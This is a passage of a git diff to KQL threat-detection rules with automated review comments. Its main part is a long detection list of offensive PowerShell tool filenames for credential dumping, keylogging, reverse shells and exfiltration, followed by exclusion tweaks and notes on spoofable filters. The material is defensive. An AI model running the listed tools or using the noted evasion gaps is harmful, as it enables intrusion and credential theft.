"\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or 
FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith 
"\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith 
"\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith 
"\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file +| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or 
FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" 
or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSExfiltrator.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or 
FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith 
"\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath 
endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath 
endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql index ed2f4df5..3bd9a478 100644 --- a/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql +++ b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql 
@@ -9,4 +9,4 @@ // - Administrators and security vendors could leverage WDAC, apply additional filters as needed. DeviceFileEvents -| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System"))) \ No newline at end of file +| where FolderPath contains "\\Windows\\System32\\CodeIntegrity\\" and (not((((InitiatingProcessCommandLine contains "ConvertFrom-CIPolicy -XmlFilePath" and InitiatingProcessCommandLine contains "-BinaryFilePath ") or InitiatingProcessCommandLine contains "CiTool --update-policy" or (InitiatingProcessCommandLine contains "Copy-Item -Path" and InitiatingProcessCommandLine contains "-Destination")) or (InitiatingProcessFolderPath endswith "\\Microsoft.ConfigurationManagement.exe" or 
InitiatingProcessFolderPath endswith "\\WDAC Wizard.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\dllhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe"))))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql index 06004f00..e150e9e2 100644 --- a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql +++ b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql 
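Review bot: The new Windows Update exclusion in the `+| where` line only whitelists the arm64 build, `C:\\Windows\\UUS\\arm64\\wuaucltcore.exe`; on x64 hosts the same updater presumably lives under another architecture folder (likely `C:\\Windows\\UUS\\amd64\\`, confirm in your DeviceFileEvents data), so those hosts will keep alerting on routine policy refreshes. Matching the binary within the protected tree instead of one architecture path, e.g. `(InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\" and InitiatingProcessFolderPath endswith "\\wuaucltcore.exe")`, fixes that without widening the exclusion beyond `C:\Windows\UUS`. Separately, the command-line based exclusions kept on the new side (`ConvertFrom-CIPolicy`, `CiTool --update-policy`, `Copy-Item -Path ... -Destination`) are attacker-controlled strings, so any process can suppress this rule by carrying them in its own command line; the header should say so, e.g. `// - Command-line filters above are FP tuning only; a process can opt out by spoofing its command line, so treat the path-based filters as the stronger signal`.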
@@ -9,4 +9,4 @@ // - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate DeviceFileEvents -| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file +| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\uus\\ARM64\\wuaucltcore.exe")) or (FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\" or FolderPath startswith "C:\\$WinREAgent\\Scratch\\Mount\\")))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql index dc4b3d89..8eb0fba6 100644 --- a/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql +++ b/KQL/rules/windows/image_load/credui_dll_loaded_by_uncommon_process.kql 
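Review bot: The new target-path exclusion `FolderPath startswith "C:\\$WinREAgent\\Scratch\\Mount\\"` drops every Startup-folder write under that prefix regardless of the writing process, but the false-positive header this hunk keeps (`// - FP could be caused by legitimate application writing shortcuts ...`) does not explain why, and neither does it for the existing `C:\\$WINDOWS.~BT\\NewOS\\` prefix. Both appear to be setup/WinRE staging trees rather than the live Startup folder of the running OS; a line such as `// - Writes under C:\$WINDOWS.~BT\NewOS\ and C:\$WinREAgent\Scratch\Mount\ are excluded because they target staged or mounted OS images, not the live profile` would let an analyst judge the exclusion without re-deriving it. Note also that the wuaucltcore.exe path here is spelled `C:\\Windows\\uus\\ARM64\\` while the WDAC rule in this same commit uses `C:\\Windows\\UUS\\arm64\\`; `in~` makes that harmless, but normalising the spelling helps grep-based audits, and as in that rule only the arm64 build is excluded, so the x64 updater (presumably under an `amd64` folder) is not covered.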
@@ -9,4 +9,4 @@ // - Other legitimate processes loading those DLLs in your environment. DeviceImageLoadEvents -| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file +| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or 